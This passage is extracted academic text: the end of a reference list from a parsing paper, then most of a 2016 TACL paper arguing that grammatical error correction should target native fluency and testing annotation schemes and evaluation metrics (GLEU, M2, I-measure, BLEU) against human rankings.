Proceedings of LREC. Sebastian Riedel and David A. Smith. 2010. Relaxed marginal inference and its application to dependency parsing. In Proceedings of NAACL-HLT. David E. Rumelhart, Geoffrey E. Hinton, and Ronald J. Williams. 1986. Learning internal representations by error propagation. In David E. Rumelhart and James L. McClelland, editors, Parallel Distributed Processing: Explorations in the Microstructure of Cognition, volume 1. MIT Press. Alexander M. Rush and Slav Petrov. 2012. Vine pruning for efficient multi-pass dependency parsing. In Pro- ceedings of NAACL-HLT. David A. Smith and Jason Eisner. 2006. Minimum-risk annealing for training log-linear models. In Proceed- ings of COLING-ACL. David A. Smith and Jason Eisner. 2008. Dependency parsing by belief propagation. In Proceedings of EMNLP. Veselin Stoyanov and Jason Eisner. 2012. Minimum-risk training of approximate CRF-Based NLP systems. In Proceedings of NAACL-HLT. Veselin Stoyanov, Alexander Ropson, and Jason Eis- ner. 2011. Empirical risk minimization of graphi- cal model parameters given approximate inference, de- coding, and model structure. In Proceedings of AIS- TATS. Martin J. Wainwright. 2006. Estimating the “wrong” graphical model: Benefits in the computation-limited setting. The Journal of Machine Learning Research, 7. Kilian Weinberger, Anirban Dasgupta, John Langford, Alex Smola, and Josh Attenberg. 2009. Feature hash- ing for large scale multitask learning. In Proceedings of ICML. Hiroyasu Yamada and Yuji Matsumoto. 2003. Statistical dependency analysis with support vector machines. In Proceedings of the International Workshop on Parsing Technologies (IWPT), volume 3. 501 502 work_oevkxmdnrjfp5akoxbszu576km ---- Reassessing the Goals of Grammatical Error Correction: Fluency Instead of Grammaticality Keisuke Sakaguchi1, Courtney Napoles1, Matt Post2, and Joel Tetreault3 1Center for Language and Speech Processing, Johns Hopkins University 2Human Language Technology Center of Excellence, Johns Hopkins University 3Yahoo {keisuke,napoles,post}@cs.jhu.edu, tetreaul@yahoo-inc.com Abstract The field of grammatical error correction (GEC) has grown substantially in recent years, with research directed at both evaluation met- rics and improved system performance against those metrics. One unvisited assumption, however, is the reliance of GEC evaluation on error-coded corpora, which contain spe- cific labeled corrections. We examine cur- rent practices and show that GEC’s reliance on such corpora unnaturally constrains annota- tion and automatic evaluation, resulting in (a) sentences that do not sound acceptable to na- tive speakers and (b) system rankings that do not correlate with human judgments. In light of this, we propose an alternate approach that jettisons costly error coding in favor of unan- notated, whole-sentence rewrites. We com- pare the performance of existing metrics over different gold-standard annotations, and show that automatic evaluation with our new anno- tation scheme has very strong correlation with expert rankings (ρ = 0.82). As a result, we ad- vocate for a fundamental and necessary shift in the goal of GEC, from correcting small, la- beled error types, to producing text that has native fluency. 1 Introduction What is the purpose of grammatical error correction (GEC)? One response is that GEC aims to help peo- ple become better writers by correcting grammatical mistakes in their writing. In the NLP community, the original scope of GEC was correcting targeted error types with the goal of providing feedback to non-native writers (Chodorow and Leacock, 2000; Dale and Kilgarriff, 2011; Leacock et al., 2014). As systems improved and more advanced methods were applied to the task, the definition evolved to whole- sentence correction, or correcting all errors of every error type (Ng et al., 2014). With this pivot, we urge the community to revisit the original question. It is often the case that writing exhibits problems that are difficult to ascribe to specific grammatical categories. Consider the following example: Original: From this scope , social media has shorten our distance . Corrected: From this scope , social media has shortened our distance . If the goal is to correct verb errors, the grammat- ical mistake in the original sentence has been ad- dressed and we can move on. However, when we aim to correct the sentence as a whole, a more vex- ing problem remains. The more prominent error has to do with how unnaturally this sentence reads. The meanings of words and phrases like scope and the corrected shortened our distance are clear, but this is not how a native English speaker would use them. A more fluent version of this sentence would be the following: Fluent: From this perspective , social media has shortened the distance between us . This issue argues for a broader definition of gram- maticality that we will term native-language flu- ency, or simply fluency. One can argue that tradi- tional understanding of grammar and grammar cor- rection encompasses the idea of native-language flu- ency. However, the metrics commonly used in eval- uating GEC undermine these arguments. The per- formance of GEC systems is typically evaluated us- 169 Transactions of the Association for Computational Linguistics, vol. 4, pp. 169–182, 2016. Action Editor: Chris Quirk. Submission batch: 12/2015; Revision batch: 4/2015; Published 5/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. ing metrics that compute corrections against error- coded corpora, which impose a taxonomy of types of grammatical errors. Assigning these codes can be difficult, as evidenced by the low agreement found between annotators of these corpora. It is also quite expensive. But most importantly, as we will show in this paper, annotating for explicit error codes places a downward pressure on annotators to find and fix concrete, easily-identifiable grammatical er- rors (such as wrong verb tense) in lieu of addressing the native fluency of the text. A related problem is the presence of multiple evaluation metrics computed over error-annotated corpora. Recent work has shown that metrics like M2 and I-measure, both of which require error- coded corpora, produce dramatically different re- sults when used to score system output and produce a ranking of systems in conventional competitions (Felice and Briscoe, 2015). In light of all of this, we suggest that the GEC task has overlooked a fundamental question: What are the best practices for corpus annotation and system evaluation? This work attempts to answer this ques- tion. We show that native speakers prefer text that exhibits fluent sentences over ones that have only minimal grammatical corrections. We explore dif- ferent methods for corpus annotation (with and with- out error codes, written by experts and non-experts) and different evaluation metrics to determine which configuration of annotated corpus and metric has the strongest correlation with the human ranking. In so doing, we establish a reliable and replicable evalu- ation procedure to help further the advancement of GEC methods.1 To date, this is the only work to un- dertake a comprehensive empirical study of annota- tion and evaluation. As we will show, the two areas are intimately related. Fundamentally, this work reframes grammati- cal error correction as a fluency task. Our pro- posed evaluation framework produces system rank- ings with strong to very strong correlations with hu- man judgments (Spearman’s ρ = 0.82, Pearson’s r = 0.73), using a variation of the GLEU metric (Napoles et al., 2015)2 and two sets of “fluent” sen- 1All the scripts and new data we collected are available at https://github.com/keisks/reassess-gec. 2This metric should not be confused with the method of the same name presented in Mutton et al. (2007) for sentence-level tence rewrites as a gold standard, which are simpler and cheaper to collect than previous annotations. 2 Current issues in GEC In this section, we will address issues of the GEC task, reviewing previous work with respect to error annotation and evaluation metrics. 2.1 Annotation methodologies Existing corpora for GEC are annotated for er- rors using fine-grained coding schemes. To create error-coded corpora, trained annotators must iden- tify spans of text containing an error, assign codes corresponding to the error type, and provide correc- tions to those spans for each error in the sentence. One of the main issues with coded annotation schemes is the difficulty of defining the granularity of error types. These sets of error tags are not easily interchangeable between different corpora. Specif- ically, two major GEC corpora have different tax- onomies: the Cambridge Learner Corpus (CLC) (Nicholls, 2003) has 80 tags, which generally repre- sent the word class of the error and the type of error (such as replace preposition, unnecessary pronoun, or missing determiner). In contrast, the NUS Cor- pus of Learner English (NUCLE) (Dahlmeier et al., 2013) has only 27 error types. A direct conversion between them, if possible, would be very complex. Additionally, it is difficult for annotators to agree on error annotations, which complicates the annotation validity as a gold standard (Leacock et al., 2014). This is due to the nature of grammatical error cor- rection, where there can be diverse correct edits for a sentence (Figure 1). In other words, there is no single gold-standard correction. The variety of error types and potential correct edits result in very low inter-annotator agreement (IAA), as reported in pre- vious studies (Tetreault and Chodorow, 2008; Ro- zovskaya and Roth, 2010; Bryant and Ng, 2015). This leads to a more fundamental question: why do we depend so much on fine-grained, low- consensus error-type annotations as a gold standard for evaluating GEC systems? One answer is that error tags can be informative and useful to provide feedback to language learn- ers, especially for specific closed-class error types fluency evaluation. 170 https://github.com/keisks/reassess-gec As the development of the technology , social media becomes more and more significant role in the whole world . With the development of technology As the technology develops As technology develops plays a more and more significant role becomes more and more significant world Figure 1: An ungrammatical sentence that can be corrected in different ways. (such as determiners and prepositions). Indeed, the CLC, the first large-scale corpus of annotated gram- matical errors, was coded specifically with the intent of gathering statistics about errors to inform the de- velopment of tools to help English language learn- ers (Nicholls, 2003). Later GEC corpora adhered to the same error-coding template, if not the same error types (Rozovskaya and Roth, 2010; Yannakoudakis et al., 2011; Dahlmeier et al., 2013). The first shared task in GEC aspired to the CLC’s same objective: to develop tools for language learn- ers (Dale and Kilgarriff, 2011). Subsequent shared tasks (Dale et al., 2012; Ng et al., 2013) followed suit, targeting specific error types. Error-coded corpora are effective training and evaluation data for targeted error correction, and statistical classi- fiers have been developed to handle errors involving closed-class words (Rozovskaya and Roth, 2014). However, the 2014 CoNLL shared task engendered a sea change in GEC: in this shared task, systems needed to correct all errors in a sentence, of all er- ror types, including ones more stylistic in nature (Ng et al., 2014). The evaluation metrics and annotated data from the previous shared task were used; how- ever we argue that they do not align with the use case of this reframed task. What is the use case of whole-sentence correction? It should not be to pro- vide specific targeted feedback on error types, but rather to rewrite sentences as a proofreader would. The community has already begun to view whole- sentence correction as a task, with the yet unstated goal of improving the overall fluency of sentences. Independent papers published human evaluations of the shared task system output (Napoles et al., 2015; Grundkiewicz et al., 2015), asking judges to rank systems based on their grammaticality. As GEC moves toward correcting an entire sentence instead of targeted error types, the myriad acceptable edits will result in much lower IAA, compromising eval- uation metrics based on the precision and recall of coded errors. At this juncture, it is crucial that we examine whether error-coded corpora and evalua- tion are necessary for this new direction of GEC. Finally, it would be remiss not to address the cost and time of corpus annotation. Tetreault and Chodorow (2008) noted that it would take 80 hours to correct 1,000 preposition errors by one trained annotator. Bryant and Ng (2015) reported that it took about three weeks (504 hours) to collect 7 independent annotations for 1,312 sentences, with all 28 CoNLL-2014 error types annotated. Clearly, constructing a corpus with fine-grained error an- notations is a labor-intensive process. Due to the time and cost of annotation, the corpora currently used in the community are few and tend to be small, hampering robust evaluations as well as lim- iting the power of statistical models for generat- ing corrections. If an effective method could be devised to decrease time or cost, larger corpora— and more of them—could be created. There has been some work exploring this, namely Tetreault and Chodorow (2008), which used a sampling ap- proach that would only work for errors involving closed-class words. Pavlick et al. (2014) also de- scribe preliminary work into designing an improved crowdsourcing interface to expedite data collection of coded errors. Section 3 outlines our annotation approach, which is faster and cheaper than previous approaches be- cause it does not make use of error coding. 2.2 Evaluation practices Three evaluation metrics3 have been proposed for GEC: MaxMatch (M2) (Dahlmeier and Ng, 2012), I-measure (Felice and Briscoe, 2015), and GLEU (Napoles et al., 2015). The first two compare the changes made in the output to error-coded spans of the reference corrections. M2 was the metric used 3Not including the metrics of the HOO shared tasks, which were precision, recall, and F-score. 171 for the 2013 and 2014 CoNLL GEC shared tasks (Ng et al., 2013; Ng et al., 2014). It captures word- and phrase-level edits by building an edit lattice and calculating an F-score over the lattice. Felice and Briscoe (2015) note problems with M2: specifically, it does not distinguish between a “do-nothing baseline” and systems that only pro- pose wrong corrections; also, phrase-level edits can be easily gamed because the lattice treats the dele- tion of a long phrase as a single edit. To address these issues, they propose I-measure, which gener- ates a token-level alignment between the source sen- tence, system output, and gold-standard sentences, and then computes accuracy based on the alignment. Unlike these approaches, GLEU does not use error-coded references4 (Napoles et al., 2015). Based on BLEU (Papineni et al., 2002), it computes n-gram precision of the system output against refer- ence sentences. GLEU additionally penalizes text in the output that was unchanged from the source but changed in the reference sentences. Recent work by Napoles et al. (2015) and Grund- kiewicz et al. (2015) evaluated these metrics against human evaluations obtained using methods bor- rowed from the Workshop on Statistical Machine Translation (Bojar et al., 2014). Both papers found a moderate to strong correlation with human judg- ments for GLEU and M2, and a slightly negative cor- relation for I-measure. Importantly, however, none of these metrics achieved as a high correlation with the human oracle ranking as desired in a fully reli- able metric. In Section 4, we examine the available metrics over different types of reference sets to identify an evaluation setup nearly as reliable as human experts. 3 Creating a new, fluent GEC corpus We hypothesize that human judges, when presented with two versions of a sentence, will favor fluent ver- sions over ones that exhibit only technical grammat- icality. By technical grammaticality, we mean adherence to an accepted set of grammatical conventions. In contrast, we consider a text to be fluent when it 4We use the term references to refer to the corrected sen- tences, since the term gold standard suggests that there is just one right correction. looks and sounds natural to a native-speaking pop- ulation. Both of these terms are hard to define pre- cisely, and fluency especially is a nuanced concept for which there is no checklist of criteria to be met.5 To carry the intuitions, Table 1 contains examples of sentences that are one, both, or neither. A text does not have to be technically grammatical to be consid- ered fluent, although in almost all cases, fluent texts are also technically grammatical. In the rest of this paper, we will demonstrate how they are quantifiably different with respect to GEC. Annotating coded errors encourages a minimal set of edits because more substantial edits often address overlapping and interacting errors. For example, the annotators of the NUCLE corpus, which was used for the recent shared tasks, were explicitly instructed to select the minimal text span of possible alterna- tives (Dahlmeier et al., 2013). There are situations where error-coded annotations are useful to help stu- dents correct specific grammatical errors. The abil- ity to do this with the non-error-coded, fluent an- notations we advocate here is no longer direct, but is not lost entirely. For this purpose, some recent studies have proposed post hoc automated error- type classification methods (Swanson and Yamangil, 2012; Xue and Hwa, 2014), which compare the orig- inal sentence to its correction and deduce the error types. We speculate that, by removing the error-coding restraint, we can obtain edits that sound more fluent to native speakers while also reducing the expense of annotation, with diminished time and training re- quirements. Chodorow et al. (2012) and Tetreault et al. (2014) suggested that it is better to have a large number of annotators to reduce bias in automatic evaluation. Following this recommendation, we col- lected additional annotations without error codes, written by both experts and non-experts. 5It is important to note that both grammaticality and fluency are determined with respect to a particular speaker population and setting. In this paper, we focus on Standard Written En- glish, which is the standard used in education, business, and journalism. While judgments of individual sentences would differ for other populations and settings (for example, spoken African-American Vernacular English), the distinction between grammaticality and fluency would remain. 172 Technically grammatical Not technically grammatical Fluent In addition, it is impractical to make such a law. I don’t like this book, it’s really boring. Not fluent Firstly , someone having any kind of disease be- longs to his or her privacy . It is unfair to release a law only point to the ge- netic disorder. Table 1: Examples and counterexamples of technically grammatical and fluent sentences. Original Genetic disorder may or may not be hirataged hereditary disease and it is sometimes hard to find out one has these kinds of diseases . Expert fluency A genetic disorder may or may not be e a hereditary disease , and it is sometimes hard to find out whether one has these kinds of diseases . Non-expert fluency Genetic e factors can manifest overtly as disease e , or simply be carried , making it e hard , sometimes , to find out if one has e a genetic predisposition to disease . Table 2: An example sentence with expert and non-expert fluency edits. Moved and changed or inserted spans are underlined and e indicates deletions. 3.1 Data collection We collected a large set of additional human correc- tions to the NUCLE 3.2 test set, 6 which was used in the 2014 CoNLL Shared Task on GEC (Ng et al., 2014) and contains 1,312 sentences error-coded by two trained annotators. Bryant and Ng (2015) col- lected an additional eight annotations using the same error-coding framework, referred to here as BN15. We collected annotations from both experts and non-experts. The experts7 were three native En- glish speakers familiar with the task. To ensure that the edits were clean and meaning-preserving, each expert’s corrections were inspected by a dif- ferent expert in a second pass. For non-experts, we used crowdsourcing, which has shown potential for annotating closed-class errors as effectively as ex- perts (Tetreault et al., 2010; Madnani et al., 2011; Tetreault et al., 2014). We hired 14 participants on Amazon Mechanical Turk (MTurk) who had a HIT approval rate of at least 95% and were located in the United States. The non-experts went through an additional screening process: before completing the task, they wrote corrections for five sample sen- tences, which were checked by the three experts.8 6www.comp.nus.edu.sg/˜nlp/conll14st.html 7All of the expert annotators are authors of this work. 8The experts verified that the participants were following the instructions and not gaming the HITs. We collected four complete sets of annotations by both types of annotators: two sets of minimal edits, designed to make the original sentences technically grammatical (following the NUCLE annotation in- structions but without error coding), and two sets of fluency edits, designed to elicit native-sounding, flu- ent text. The instructions were: • Minimal edits: Make the smallest number of changes so that each sentence is grammatical. • Fluency edits: Make whatever changes neces- sary for sentences to appear as if they had been written by a native speaker. In total, we collected 8 (2 × 2 × 2) annotations from each original sentence (minimal and fluency, expert and non-expert, two corrections each). Of the original 1,312 sentences, the experts flagged 34 sentences that needed to be merged together, so we skipped these sentences in our analysis and experi- ments. In the next two subsections we compare the changes made under both the fluency and minimal edit conditions (Section 3.2) and show how humans rate corrections made by experts and non experts in both settings (Section 3.3). 3.2 Edit analysis When people (both experts and non-experts) are asked to make minimal edits, they make few changes 173 www.comp.nus.edu.sg/~nlp/conll14st.html Original Some family may feel hurt , with regards to their family pride or reputation , on having the knowl- edge of such genetic disorder running in their family . NUCLE Some family members may feel hurt e with regards to their family pride or reputation e on having the knowledge of a genetic disorder running in their family . Expert fluency On e learning of such a genetic disorder running in their family , some family members may feel hurt e regarding their family pride or reputation . Non-expert fluency Some relatives may e be concerned about the family ’s e reputation – not to mention their own pride – in relation to this news of e familial genetic defectiveness e . Expert minimal Some families may feel hurt e with regards to their family pride or reputation , on having e knowledge of such a genetic disorder running in their family . Non-expert minimal Some family may feel hurt e with regards to their family pride or reputation e on having the knowledge of such genetic disorder running in their family . Table 3: An example sentence with the original NUCLE correction and fluency and minimal edits written by experts and non-experts. Moved and changed or inserted spans are underlined and e indicates deletions. to the sentences and also change fewer of the sen- tences. Fluency edits show the opposite effect, with non-experts taking more liberties than experts with both the number of sentences changed and the de- gree of change within each sentence (see Table 2 for an extreme example of this phenomenon). In order to quantify the extent of changes made in the different annotations, we look at the percent of sentences that were left unchanged as well as the number of changes needed to transform the original sentence into the corrected annotation. To calculate the number of changes, we used a modified Trans- lation Edit Rate (TER), which measures the number of edits needed to transform one sentence into an- other (Snover et al., 2006). An edit can be an inser- tion, deletion, substitution, or shift. We chose this metric because it counts the movement of a phrase (a shift) as one change, which the Levenshtein dis- tance would heavily penalize. TER is calculated as the number of changes per token, but instead we re- port the number of changes per sentence for ease of interpretation, which we call the sTER. We compare the original set of sentences to the new annotations and the existing NUCLE and BN15 reference sets to determine the relative extent of changes made by the fluency and minimal edits (Fig- ure 2). Compared to the original, non-experts had a higher average sTER than experts, meaning that they made more changes per sentence. For fluency ed- its, experts and non-experts changed approximately the same number of sentences, but the non-experts made about seven edits per sentence compared to the experts’ four. Minimal edits by both experts and non-experts exhibit a similar degree of change from the original sentences, so further qualitative assess- ment is necessary to understand whether the annota- tors differ. Table 3 contains an example of how the same ungrammatical sentence was corrected using both minimal and fluency edits, as well as one of the original NUCLE corrections. The error-coded annotations of NUCLE and BN15 fall somewhere in between the fluency and minimal edits in terms of sTER. The most conser- vative set of sentences is the system output of the CoNLL 2014 shared task, with sTER = 1.4, or ap- proximately one change made per sentence. In con- trast, the most conservative human annotations, the minimal edits, edited a similar percent of the sen- tences but made about two changes per sentence. When there are multiple annotators working on the same data, one natural question is the inter- annotator agreement (IAA). For GEC, IAA is of- ten low and arguably not an appropriate measure of agreement (Bryant and Ng, 2015). Additionally, it would be difficult, if possible, to reliably calculate IAA without coded alignments between the new and 174 NUCLE BN15 E-minimal N-minimal E-fluency N-fluency Output 0% 20% 40% 60% 80% 100% Percent of sentences changed NUCLE BN15 E-minimal N-minimal E-fluency N-fluency Output 0 1 2 3 4 5 6 7 8 Mean sTER Insertions Deletions Substitutions Phrases shifted Figure 2: Amount of changes made by different annota- tion sets compared to the original sentences. original sentences. Therefore, we look at two al- ternate measures: the percent of sentences to which different annotators made the same correction(s) and the sTER between two annotators’ corrections, re- ported in Table 4. As we expect, there is notably lower agreement between the annotators for fluency edits than for minimal edits, due to the presumably smaller set of required versus optional stylistic changes. Expert annotators produced the same correction on 15% of the fluency edits, but more than 38% of their min- imal edits were identical. Half of these identical sentences were unchanged from the original. There was lower agreement between non-expert annotators than experts on both types of edits. We performed the same calculations between the two NUCLE an- notators and found that they had agreement rates similar to the non-expert minimal edits. However, the experts’ minimal edits have much higher con- sensus than both the non-experts’ and NUCLE, with twice as many identical corrected sentences and half the sTER. From this analysis, one could infer that the expert annotations are more reliable than the non-expert be- cause there are fewer differences between annotators Edit type Annotator Identical sTER Fluency E1 v. E2 15.3% 5.1 N1 v. N2 5.9% 10.0 E v. N 8.5% 7.9 Minimal E1 v. E2 38.7% 1.7 N1 v. N2 21.8% 2.9 E v. N 25.9% 2.4 NUCLE A v. B. 18.8% 3.3 Table 4: A comparison of annotations across different annotators (E for expert, N for non-expert). Where there were more than two annotators, statistics are over the full pairwise set. Identical refers to the percentage of sen- tences where both annotators made the same correction and sTER is the mean sTER between the annotators’ cor- rections. and fewer changes per sentence. 3.3 Human evaluation As an additional validation, we ran a task to establish the relative quality of the new fluency and minimal- edit annotations using crowdsourcing via MTurk. Participants needed to be in the United States with a HIT approval rate of at least 95% and pass a pre- liminary ranking task, graded by the authors. We randomly selected 300 sentences and asked partici- pants to rank the new annotations, one randomly se- lected NUCLE correction, and the original sentence in order of grammaticality and meaning preservation (that is, a sentence that is well-formed but changes the meaning of the original source should have a lower rank than one that is equally well-formed but maintains the original meaning). Since we were comparing the minimal edits to the fluency edits, we did not define the term grammaticality, but instead relied on the participants’ understanding of the term. Each sentence was ranked by two different judges, for a total of 600 rankings, yielding 7,795 pairwise comparisons. To rank systems, we use the TrueSkill approach (Herbrich et al., 2006; Sakaguchi et al., 2014), based on a protocol established by the Workshop on Ma- chine Translation (Bojar et al., 2014; Bojar et al., 2015). For each competing system, TrueSkill infers the absolute system quality from the pairwise com- parisons, representing each as the mean of a Gaus- sian. These means can then be sorted to rank sys- 175 # Score Range Annotation type 1 1.164 1–2 Expert fluency 0.976 1–2 Non-expert fluency 3 0.540 3 NUCLE 4 0.265 4 Expert minimal 5 -0.020 5 Non-expert minimal 6 -2.925 6 Original sentence Table 5: Human ranking of the new annotations by gram- maticality. Lines between systems indicate clusters ac- cording to bootstrap resampling at p ≤ 0.05. Systems in the same cluster are considered to be tied. tems. By running TrueSkill 1,000 times using boot- strap resampling and producing a system ranking each time, we collect a range of ranks for each sys- tem. We can then cluster systems according to non- overlapping rank ranges (Koehn, 2012) to produce the final ranking, allowing ties. Table 5 shows the ranking of “grammatical” judg- ments for the additional annotations and the orig- inal NUCLE annotations. While the score of the expert fluency edits is higher than the non-expert fluency, they are within the same cluster, suggest- ing that the judges perceived them to be just as good. The fluency rewrites by both experts and non- experts are clearly preferable over the minimal edit corrections, although the error-coded NUCLE cor- rections are perceived as more grammatical than the minimal corrections. 4 Automatic metrics We have demonstrated that humans prefer fluency edits to error-coded and minimal-edit corrections, but it is unclear whether these annotations are an effective reference for automatic evaluation. The broad range of changes that can be made with non- minimal edits may make it especially challenging for current automatic evaluation metrics to use. In this section, we investigate the impact that differ- ent reference sets have on the system ranking found by different evaluation metrics. With reference sets having such different characteristics, the natural question is: which reference and evaluation metric pairing best reflects human judgments of grammati- cality? To answer this question, we performed a compre- hensive investigation of existing metrics and anno- tation sets to evaluate the 12 system outputs made public from the 2014 CoNLL Shared Task. To our knowledge, this is the first time that the interplay of annotation scheme and evaluation metric, as well as the rater expertise, has been evaluated jointly for GEC. 4.1 Experimental setup The four automatic metrics that we investigate are M2, I-measure,9 GLEU, and BLEU. We include the machine-translation metric BLEU because evaluat- ing against our new non-coded annotations is similar to machine-translation evaluation, which considers overlap instead of absolute alignment between the output and reference sentences. For the M2 and I-measure evaluations, we aligned the fluency and minimal edits to the original sen- tences using a Levenshtein edit distance algorithm.10 Neither metric makes use of the annotation labels, so we simply assigned dummy error codes. Our GLEU implementation differs from that of Napoles et al. (2015). We use a simpler, modified version: Precision is the number of candidate (C) n-grams that match the reference (R) n-grams, mi- nus the counts of n-grams found more often in the source (S) than the reference (Equation 1). Because the number of possible reference n-grams increases as more reference sets are used, we calculate an in- termediate GLEU by drawing a random sample from one of the references and report the mean score over 500 iterations.11 We compare the system outputs to each of the six annotation sets and a seventh set containing all of the annotations, using each metric. We ranked the systems based on their scores using each metric– annotation-set pair, and thus generated a total of 28 different rankings (4 metrics × 7 annotation sets). To determine the best metric, we compared the system-level ranking obtained from each evaluation technique against the expert human ranking reported in Grundkiewicz et al. (2015), Table 3c. 9We ran I-measure with the -nomix flag, preventing the al- gorithm from finding the optimal alignment across all possible edits. Alignment was very memory-intensive and time consum- ing, even when skipping long sentences. 10Costs for insertion, deletion, and substitution are set to 1, allowing partial match (e.g. same lemma). 11Running all iterations, it takes less than 30 seconds to eval- uate 1,000 sentences. 176 p∗n = ( ∑ ngram∈{C∩R} countC,R(ngram)− ∑ ngram∈{C∩S} max [0, countC,S(ngram)− countC,R(ngram)] ) ∑ ngram∈{C} count(ngram) countA,B(ngram) = min (# occurrences of ngram in A, # occurrences of ngram in B) (1) M2 GLEU I-measure BLEU 0.6 0.4 0.2 0.0 0.2 0.4 0.6 0.8 NUCLE (2) BN15 (10) E-fluency (2) N-fluency (2) E-minimal (2) N-minimal (2) All (20) Figure 3: Correlation of the human ranking with metric scores over different reference sets (Spearman’s ρ). The number of annotations per sentence in each set is in parentheses. See Table 6 for the numeric values. M2 GLEU I-measure BLEU NUCLE 0.725 0.626 -0.423 -0.456 0.677* 0.646 -0.313 -0.310 BN15 0.692 0.720 -0.066 -0.319* 0.641 0.697 -0.007 -0.255 E-fluency 0.758 0.819* -0.297 -0.385 0.665 0.731* -0.256 -0.230* N-fluency 0.703 0.676 -0.451 -0.451 0.655 0.668 -0.319 -0.388 E-min. 0.775* 0.786 -0.467 -0.456 0.655 0.676 -0.385 -0.396 N-min. 0.769 -0.187 -0.467 -0.495 0.641 -0.110 -0.402 -0.473 All 0.692 0.725 -0.055* -0.462 0.617 0.724 0.061* -0.314 Table 6: Correlation between the human ranking and metric scores over different reference sets. The first line of each cell is Spearman’s ρ and the second line is Pear- son’s r. The strongest correlations for each metric are starred, and the overall strongest correlations are in bold. 4.2 Results Figure 3 and Table 6 show the correlation of the expert rankings with all of the evaluation configu- rations. For the leading metrics, M2 and GLEU, the expert annotations had stronger positive corre- lations than the non-expert annotations. Using just two expert fluency annotations with GLEU has the strongest correlation with the human ranking out of all other metric–reference pairings (ρ = 0.819, r = 0.731), and it is additionally cheaper and faster to collect. E-fluency is the third-best reference set with M2, which does better with minimal changes: the reference sets with the strongest correlations for M2 are E-minimal (ρ = 0.775) and NUCLE (r = 0.677). Even though the non-expert fluency edits had more changes than the expert fluency edits, they still did reasonably well using both M2 and GLEU. The GLEU metric has strongest correlation when comparing against the E-fluency, BN15, E-minimal, and “All” reference sets. One could argue that, ex- cept for E-minimal, these references all have greater diversity of edits than NUCLE and minimal edits. Although BN15 has fewer changes made per sen- tence than the fluency edits, because of the number of annotators, the total pool of n-grams seen per sen- tence increases. E-minimal edits also have strong correlation, suggesting there may be a trade-off be- tween quantity and quality of references. A larger number of references could improve per- formance for GLEU. Because fluency edits tend to have more variations than error-coded minimal-edit annotations, it is not obvious how many fluency ed- its are necessary to cover the full range of possible corrections. To address this question, we ran an ad- 177 ditional small-scale experiment, where we collected 10 non-expert fluency edits for 20 sentences and computed the average GLEU scores of the submit- ted systems against an increasing number of these fluency references. The result (Figure 5) shows that the GLEU score with more fluency references, but the effect starts to level off when there are at least 4 references, suggesting that 4 references cover the majority of possible changes. A similar pattern was observed by Bryant and Ng (2015) in error-coded annotations with the M2 metric. The reference sets against which M2 has the strongest correlation are NUCLE, expert fluency, and expert minimal edits. Even non-expert fluency annotations result in a stronger correlation with the human metric than BN15. These findings support the use of fluency edits even with a metric designed for error-coded corpora. One notable difference between M2 and GLEU is their relative performance using non-expert mini- mal edits as a metric. M2 is robust to the non-expert minimal edits and, as a reference set, this achieves the second strongest Spearman’s correlation for this metric. However, pairing the non-expert minimal edits with GLEU results in slightly negative correla- tion. This is an unexpected result, as there is sizable overlap between the non-expert and expert minimal edits (Table 4). We speculate that this difference may be due to the quality of the non-expert minimal edits. Recall that humans perceived these sentences to be worse than the other annotations, and better only than the original sentence (Table 5). I-measure and BLEU are shown to be unfavorable for this task, having negative correlation with the hu- man ranking, which supports the findings of Napoles et al. (2015) and Grundkiewicz et al. (2015). Even though BLEU and GLEU are both based on the n- gram overlap between the hypothesis and original sentences, GLEU has strong positive correlations with human rankings while BLEU has a moderate negative correlation. The advantage of GLEU is that it penalizes n-grams in the system output that were present in the input sentence and absent from the reference. In other words, a system loses credit for missing n-grams that should have been changed. BLEU has no such penalty and instead only rewards n-grams that occur in the references and the output, which is a problem in same-language text rewriting CAMB POST CUUI AMU PKU RAC UMC SJTU NTHU UFC IITB IPN input AMU CAMB RAC CUUI POST PKU UMC UFC IITB input SJTU NTHU IPN Expert GLEU E-fluency Figure 4: System rankings produced by GLEU with ex- pert fluency (E-fluency) as the reference compared to the expert human ranking. Figure 5: Mean GLEU scores with different numbers of fluency references. The red line corresponds to the aver- age GLEU score of the 12 GEC systems and the vertical bars show the maximum and minimum GLEU scores. tasks where there is significant overlap between the reference and the original sentences. For this data, BLEU assigns a higher score to the original sen- tences than to any of the systems.12 Figure 4 shows the system ranking for the most strongly correlated annotation–evaluation combi- nation (GLEU with E-fluency) compared to the “ground truth” human rankings. The automatic met- ric clusters the systems into the correct upper and lower halves, and the input is correctly placed in the lower half of the rankings. 12Of course, it could be that the input sentences are the best, but the human ranking in Figure 4 suggests otherwise. 178 Even though automatic metrics strongly correlate with human judgments, they still do not have the same reliability as manual evaluation. Like error- coded annotations, judgment by specialists is expen- sive, so we investigate a more practical alternative in the following section. 5 Human evaluation Automatic metrics are only a proxy for human judg- ments, which are crucial to truthfully ascertain the quality of systems. Even the best result in Section 4.2, which is state of the art and has very strong rank correlation (ρ = 0.819) with the expert rank- ing, makes dramatic errors in the system ranking. Given the inherent imperfection of automatic eval- uation (and possible over-optimization to the NU- CLE data set), we recommend that human evalua- tion be produced alongside metric scores whenever possible. However, human judgments can be ex- pensive to obtain. Crowdsourcing may address this problem and has been shown to yield reasonably good judgments for several error types at a relatively low cost (Tetreault et al., 2014). Therefore, we ap- ply crowdsourcing to sentence-level grammaticality judgments, by replicating previous experiments that reported expert rankings of system output (Napoles et al., 2015; Grundkiewicz et al., 2015) using non- experts on MTurk. 5.1 Experimental setup Using the same data set as those experiments and the work described in this paper, we asked screened participants13 on MTurk to rank five randomly se- lected systems and NUCLE corrections from best to worst, with ties allowed. 294 sentences were ran- domly selected for evaluation from the NUCLE sub- section used in Grundkiewicz et al. (2015), and the output for each sentence was ranked by two different participants. The 588 system rankings yield 26,265 pairwise judgments, from which we inferred the ab- solute system ranking using TrueSkill. 5.2 Results Figure 6 compares the system ranking by non- experts to the same expert ranking used in Sec- 13Participants in the United States with a HIT approval rate ≥ 95% had to pass a sample ranking task graded by the authors. AMU CAMB CUUI POST RAC UMC IITB PKU input UFC SJTU IPN NTHU AMU CAMB RAC CUUI POST PKU UMC UFC IITB input SJTU NTHU IPN Expert Non-expert Figure 6: Output of system rankings by experts and non- experts, from best to worst. Dotted lines indicate clusters according to bootstrap resampling (p ≤ 0.05). Judges κ κw Non-experts 0.29 0.43 Experts 0.29 0.45 Non-experts and Experts 0.15 0.23 Table 7: Inter-annotator agreement of pairwise system judgments within non-experts, experts and between them. We show Cohen’s κ and quadratic-weighted κ.15 tion 4.1. The rankings have very strong correla- tion (ρ = 0.917, r = 